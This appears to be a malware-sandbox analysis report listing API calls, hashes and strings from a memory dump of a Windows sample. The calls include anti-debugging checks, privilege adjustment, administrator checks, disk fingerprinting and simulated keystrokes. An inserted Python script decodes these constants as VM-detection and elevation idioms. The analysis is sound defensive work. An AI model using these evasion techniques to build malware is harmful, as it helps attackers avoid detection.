                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Find$File$CloseFirstNext
                                                      • String ID:
                                                      • API String ID: 3541575487-0
                                                      • Opcode ID: 4b0552af105586b03aeaa5eb4e45fc9c75d68729038e9877e3d9a95d79241392
                                                      • Instruction ID: abeabad20b86d46ee041ebfa81a2f7deb290f3556827c4243738eeebd8dcaf30
                                                      • Opcode Fuzzy Hash: 4b0552af105586b03aeaa5eb4e45fc9c75d68729038e9877e3d9a95d79241392
                                                      • Instruction Fuzzy Hash: E251BC34A046019FDB15DF28D894A9AB7E4FF49324F14855EE95A8B3A2CB30ED04DF91
                                                      APIs
                                                      • IsDebuggerPresent.KERNEL32 ref: 00F5271A
                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00F52724
                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 00F52731
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                      • String ID:
                                                      • API String ID: 3906539128-0
                                                      • Opcode ID: 931b35a8f28a9918990a9b0d0e48cec980ccb75f0dcd980b1d49ec67a0b7911f
                                                      • Instruction ID: 7d028e433d2f9c0ab29b491ec656d49fdc7b3ecf8d89c1ebc061510fc5bfd64f
                                                      • Opcode Fuzzy Hash: 931b35a8f28a9918990a9b0d0e48cec980ccb75f0dcd980b1d49ec67a0b7911f
                                                      • Instruction Fuzzy Hash: 9C31D87491121C9BCB61DF64DC88BDDBBB8AF08310F5042EAE90CA7261E7349F859F85
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 00F951DA
                                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00F95238
                                                      • SetErrorMode.KERNEL32(00000000), ref: 00F952A1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$DiskFreeSpace
                                                      • String ID:
                                                      • API String ID: 1682464887-0
                                                      • Opcode ID: ff11db67a1254f2e106e9586cbd6867cd39d59ac2985483003a39953701e181f
                                                      • Instruction ID: 20c69271e0b27b6b299ad7248cd64de28126156c1c281172be6ac6ff62a18ae5
                                                      • Opcode Fuzzy Hash: ff11db67a1254f2e106e9586cbd6867cd39d59ac2985483003a39953701e181f
                                                      • Instruction Fuzzy Hash: D2313075A00518DFDB00DF54D8C4EADBBB4FF49314F088099E905AB362DB35E855DBA0
                                                      APIs
                                                        • Part of subcall function 00F3FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00F40668
                                                        • Part of subcall function 00F3FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00F40685
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F8170D
                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F8173A
                                                      • GetLastError.KERNEL32 ref: 00F8174A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                      • String ID:
                                                      • API String ID: 577356006-0
                                                      • Opcode ID: f380507a83b86d61031e86ab03b11b48ea8267df7518c187d6a527a54390e69f
                                                      • Instruction ID: 4dc844d49069e1343f44e7e53db3f9ec3e25f774be8e6aed454aa600e720e8fb
                                                      • Opcode Fuzzy Hash: f380507a83b86d61031e86ab03b11b48ea8267df7518c187d6a527a54390e69f
                                                      • Instruction Fuzzy Hash: BF1182B2804208AFD718AF54DCC6DABB7BDFB44764B20862EF05656241EB70BC469B60
                                                      APIs
                                                      • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00F8D608
                                                      • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00F8D645
                                                      • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00F8D650
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: CloseControlCreateDeviceFileHandle
                                                      • String ID:
                                                      • API String ID: 33631002-0
                                                      • Opcode ID: 9a94926d4a1ae67cf8f4bf1a32c858721642afd276f3446600c70c8edf98c51d
                                                      • Instruction ID: b2157122699afd785cca8a87013fb05e23abc7348716101dc4dd36f483e8d24d
                                                      • Opcode Fuzzy Hash: 9a94926d4a1ae67cf8f4bf1a32c858721642afd276f3446600c70c8edf98c51d
                                                      • Instruction Fuzzy Hash: 7A113C75E05228BBDB109F99AC85FAFBBBCEB45B60F108125F904E7290D6704A059BA1
                                                      APIs
                                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00F8168C
                                                      • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00F816A1
                                                      • FreeSid.ADVAPI32(?), ref: 00F816B1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                                      • String ID:
                                                      • API String ID: 3429775523-0
                                                      • Opcode ID: bc6988f266e6e1495833688483b46892ceebcbba130816b887bf922891a57ff8
                                                      • Instruction ID: 23111864273c3b6257b95046360c6c34e9853abd8abb5c9dee034deb178bd15f
                                                      • Opcode Fuzzy Hash: bc6988f266e6e1495833688483b46892ceebcbba130816b887bf922891a57ff8
                                                      • Instruction Fuzzy Hash: EBF0F47195030DFBDB00EFE49C89AAEBBBCFB08644F504665E501E2181E774AA449BA0
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(00F528E9,?,00F44CBE,00F528E9,00FE88B8,0000000C,00F44E15,00F528E9,00000002,00000000,?,00F528E9), ref: 00F44D09
                                                      • TerminateProcess.KERNEL32(00000000,?,00F44CBE,00F528E9,00FE88B8,0000000C,00F44E15,00F528E9,00000002,00000000,?,00F528E9), ref: 00F44D10
                                                      • ExitProcess.KERNEL32 ref: 00F44D22
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Process$CurrentExitTerminate
                                                      • String ID:
                                                      • API String ID: 1703294689-0
                                                      • Opcode ID: 044dd6e60393634a02e3903701c1bbf8a3da4b3a24cce574537a095ba4289f72
                                                      • Instruction ID: 9c1c86f37c0a273ca63a557d194ce9ef8e5878e743a0220b876b24f1c81511ea
                                                      • Opcode Fuzzy Hash: 044dd6e60393634a02e3903701c1bbf8a3da4b3a24cce574537a095ba4289f72
                                                      • Instruction Fuzzy Hash: 0DE0B631800149ABCF11AF54DD49A593FB9EB41791B544118FD45AA222CB39ED42EE80
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: /
                                                      • API String ID: 0-2043925204
                                                      • Opcode ID: 845998db76b5b177eb9d4cec8eea387f00c622bbf9254ea7bfd000a70f17219b
                                                      • Instruction ID: 554f7b863b6678558beb1dfa26c0d3220867708fc23dcffee5bfe7718e6f3ae3
                                                      • Opcode Fuzzy Hash: 845998db76b5b177eb9d4cec8eea387f00c622bbf9254ea7bfd000a70f17219b
                                                      • Instruction Fuzzy Hash: DF4126729003186FCB209FB9CC89EBB77B8EB84325F504269FE06C7180E6709D859B90
                                                      APIs
                                                      • GetUserNameW.ADVAPI32(?,?), ref: 00F7D28C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: NameUser
                                                      • String ID: X64
                                                      • API String ID: 2645101109-893830106
                                                      • Opcode ID: 6da4ff1910995acdc1934e6c602a5540ec61a2aafe2582b2ace82c1bfaf40bd1
                                                      • Instruction ID: c91d87330b3bb537ef243f15e597019986b4be05a0e1eec15e371b1a0382662e
                                                      • Opcode Fuzzy Hash: 6da4ff1910995acdc1934e6c602a5540ec61a2aafe2582b2ace82c1bfaf40bd1
                                                      • Instruction Fuzzy Hash: 14D0C9B580111DEBCB94DB90ECC8EDEB37CBB04345F104252F506E2000DB309549AF10
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                      • Instruction ID: 35a14923dc98218f273d01919280d5c2c4cee03ea5cfa8d9800e43a88d938ee0
                                                      • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                      • Instruction Fuzzy Hash: 56023D72E012199FDF54CFA9C8806ADFBF1FF88324F258169D919E7380D731AA419B94
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00F96918
                                                      • FindClose.KERNEL32(00000000), ref: 00F96961
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Find$CloseFileFirst
                                                      • String ID:
                                                      • API String ID: 2295610775-0
                                                      • Opcode ID: 7ccc20e39cd83b9495357c4b319fe6e345347af643905606157d53555301bd29
                                                      • Instruction ID: 9601cdb90a0e00ecef9a6efe4c5521941307e7b611e26648af2535c15472c718
                                                      • Opcode Fuzzy Hash: 7ccc20e39cd83b9495357c4b319fe6e345347af643905606157d53555301bd29
                                                      • Instruction Fuzzy Hash: 961190316042109FDB10DF29D885A1ABBE5FF89328F15C699E4698F6A2C734EC05DBD1
                                                      APIs
                                                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00FA4891,?,?,00000035,?), ref: 00F937E4
                                                      • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00FA4891,?,?,00000035,?), ref: 00F937F4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: ErrorFormatLastMessage
                                                      • String ID:
                                                      • API String ID: 3479602957-0
                                                      • Opcode ID: 4329d1d5df5778f786f96cb71c7c22cc66d6b1980a9fa54ff4521a5b107119ef
                                                      • Instruction ID: 5f3e2401e95d04a63d23b099e8a4efc97da00ac52e7813874c932d8010cf84e0
                                                      • Opcode Fuzzy Hash: 4329d1d5df5778f786f96cb71c7c22cc66d6b1980a9fa54ff4521a5b107119ef
                                                      • Instruction Fuzzy Hash: A2F0EC716042292AEB2017A55C4DFDB369DEFC4761F000265F509D2191D5605904D6F1
                                                      APIs
                                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00F8B25D
                                                      • keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 00F8B270
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: InputSendkeybd_event
                                                      • String ID:
                                                      • API String ID: 3536248340-0
                                                      • Opcode ID: 6c966f8df11bfa9ab93533ad51193f2e0dfeedb8b5d9affc2fdf8237d6b47439
                                                      • Instruction ID: 2bba066013d0924533c5bea8a8bd79777861228c0a79deb5fb5bd0310683e3bd
                                                      • Opcode Fuzzy Hash: 6c966f8df11bfa9ab93533ad51193f2e0dfeedb8b5d9affc2fdf8237d6b47439
                                                      • Instruction Fuzzy Hash: 23F06D7180424DABDB059FA0C805BEE7BB0FF04305F008009F951A5191C7798201AF94
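The sandbox prints the arguments of three of the calls above only as raw hex: the DeviceIoControl call with control code 002D1400 and a 0000000C-byte input buffer, the AllocateAndInitializeSid call with sub-authority count 00000002 and sub-authorities 00000020 and 00000220 that feeds CheckTokenMembership, and the SendInput call whose cbSize argument is 0000001C. The Python script below is an added editorial example, not code from the Joe Sandbox report or from the sample, that decodes those constants using only the public Windows SDK definitions (the CTL_CODE bit layout from winioctl.h, the S-1-authority-subauthority SID form from winnt.h, and the INPUT structure layout from winuser.h). Two inputs are assumptions because the report does not resolve them: the identifier authority passed in the first argument, shown as ?, is taken to be SECURITY_NT_AUTHORITY (the value the usual BUILTIN\Administrators check passes), and the 12-byte STORAGE_PROPERTY_QUERY is built with StorageDeviceProperty and PropertyStandardQuery, since the listing shows the buffer size but not its contents.

```python
"""Decode raw argument constants from the API listings above.

Added editorial example; not code from the Joe Sandbox report or the sample.
Uses only public Windows SDK definitions (winioctl.h, winnt.h, winuser.h).
"""
import struct

# --- DeviceIoControl: CTL_CODE layout --------------------------------------
# CTL_CODE(DeviceType, Function, Method, Access) =
#   (DeviceType << 16) | (Access << 14) | (Function << 2) | Method
FILE_DEVICE_MASS_STORAGE = 0x2D          # IOCTL_STORAGE_BASE
METHODS = {0: "METHOD_BUFFERED", 1: "METHOD_IN_DIRECT",
           2: "METHOD_OUT_DIRECT", 3: "METHOD_NEITHER"}
ACCESS = {0: "FILE_ANY_ACCESS", 1: "FILE_READ_ACCESS",
          2: "FILE_WRITE_ACCESS", 3: "FILE_READ_ACCESS|FILE_WRITE_ACCESS"}
# IOCTL_STORAGE_QUERY_PROPERTY = CTL_CODE(IOCTL_STORAGE_BASE, 0x0500,
#                                         METHOD_BUFFERED, FILE_ANY_ACCESS)
KNOWN_IOCTLS = {0x2D1400: "IOCTL_STORAGE_QUERY_PROPERTY"}


def decode_ioctl(code: int) -> dict:
    """Split a control code into its CTL_CODE fields and name it if known."""
    return {
        "device_type": (code >> 16) & 0xFFFF,
        "access": ACCESS[(code >> 14) & 0x3],
        "function": (code >> 2) & 0xFFF,
        "method": METHODS[code & 0x3],
        "name": KNOWN_IOCTLS.get(code, "unknown"),
    }


def build_storage_property_query(property_id: int = 0, query_type: int = 0) -> bytes:
    """STORAGE_PROPERTY_QUERY: DWORD PropertyId, DWORD QueryType,
    BYTE AdditionalParameters[1] plus 3 bytes of padding -> 12 bytes, the
    0x0C input size seen in the listing. The defaults (StorageDeviceProperty=0,
    PropertyStandardQuery=0) are an assumption; the report shows only the size."""
    return struct.pack("<IIB3x", property_id, query_type, 0)


# --- AllocateAndInitializeSid -> SID string --------------------------------
SECURITY_NT_AUTHORITY = 5                # assumed for the unresolved '?' argument
WELL_KNOWN_SIDS = {"S-1-5-32-544": "BUILTIN\\Administrators"}


def sid_from_allocate_args(authority: int, count: int, *slots: int) -> str:
    """Rebuild the SID text from AllocateAndInitializeSid's argument order:
    (pIdentifierAuthority, nSubAuthorityCount, sub0..sub7). Only the first
    `count` sub-authority slots are meaningful; the remaining slots are ignored."""
    subs = slots[:count]
    return "S-1-%d-%s" % (authority, "-".join(str(s) for s in subs))


def name_sid(sid: str) -> str:
    """Map a SID string to its well-known account name, if we know it."""
    return WELL_KNOWN_SIDS.get(sid, "unknown")


# --- SendInput: sizeof(INPUT) by pointer size --------------------------------
def _align(offset: int, boundary: int) -> int:
    return (offset + boundary - 1) // boundary * boundary


def sizeof_input(pointer_size: int) -> int:
    """INPUT = { DWORD type; union { MOUSEINPUT, KEYBDINPUT, HARDWAREINPUT } }.
    MOUSEINPUT (five DWORDs then ULONG_PTR dwExtraInfo) is the largest member,
    and the union inherits its pointer-size alignment, so the size is
    28 bytes on x86 and 40 bytes on x64."""
    mouseinput = _align(5 * 4, pointer_size) + pointer_size
    return _align(4, pointer_size) + mouseinput


def decode_listing() -> dict:
    """Decode the exact constants that appear in the three listings above."""
    return {
        "ioctl": decode_ioctl(0x002D1400),
        "query_len": len(build_storage_property_query()),   # equals 0x0C
        "sid": sid_from_allocate_args(SECURITY_NT_AUTHORITY, 0x2, 0x20, 0x220,
                                      0, 0, 0, 0, 0, 0),
        "sid_name": name_sid(sid_from_allocate_args(SECURITY_NT_AUTHORITY, 0x2,
                                                    0x20, 0x220, 0, 0, 0, 0, 0, 0)),
        "sendinput_cbsize_is_x86": sizeof_input(4) == 0x1C,
    }


if __name__ == "__main__":
    for key, value in decode_listing().items():
        print(f"{key}: {value}")
```

Read together, the decoded values say more than the hex does: 002D1400 is IOCTL_STORAGE_QUERY_PROPERTY on a FILE_DEVICE_MASS_STORAGE handle with a 12-byte query, which is how a program asks a drive for its descriptor (bus type, vendor, removable flag), a common sandbox or VM fingerprinting input; the SID S-1-5-32-544 passed to CheckTokenMembership is BUILTIN\Administrators, the standard "am I elevated" idiom; and a cbSize of 0x1C for INPUT only matches the 32-bit layout, consistent with the 32-bit image base 00F20000 in the memory dump source.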
                                                      APIs
                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00F811FC), ref: 00F810D4
                                                      • CloseHandle.KERNEL32(?,?,00F811FC), ref: 00F810E9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: AdjustCloseHandlePrivilegesToken
                                                      • String ID:
                                                      • API String ID: 81990902-0
                                                      • Opcode ID: f82e3ab6b68bd9fef48e1921d85039fbeb80cea29f41ccc8cd3fe540c21df8cc
                                                      • Instruction ID: f0925801ca95378b5200bc4adb731cb49141a3feaf6eacffbee1b8e83464afe1
                                                      • Opcode Fuzzy Hash: f82e3ab6b68bd9fef48e1921d85039fbeb80cea29f41ccc8cd3fe540c21df8cc
                                                      • Instruction Fuzzy Hash: 9BE0BF72418610AFF7252B51FC09E7777E9EB04320F14892DF5A5804B5DB626C91EB50
                                                      Strings
                                                      • Variable is not of type 'Object'., xrefs: 00F70C40
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Variable is not of type 'Object'.
                                                      • API String ID: 0-1840281001
                                                      • Opcode ID: 3e5f7f18207cd3340d812f4c6efb6b5e8a88a5c23a58d5a22b6a08823c1d8bd6
                                                      • Instruction ID: 19e00d12fe6051391225acb4dd9ef76eabd6019e92c3e71409c7cf551c1343bc
                                                      • Opcode Fuzzy Hash: 3e5f7f18207cd3340d812f4c6efb6b5e8a88a5c23a58d5a22b6a08823c1d8bd6
                                                      • Instruction Fuzzy Hash: DA32A171D00228DBCF14DF90E981BEDB7B5BF05314F54805AE80AAB281DB75AD45EBA1
                                                      APIs
                                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00F56766,?,?,00000008,?,?,00F5FEFE,00000000), ref: 00F56998
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
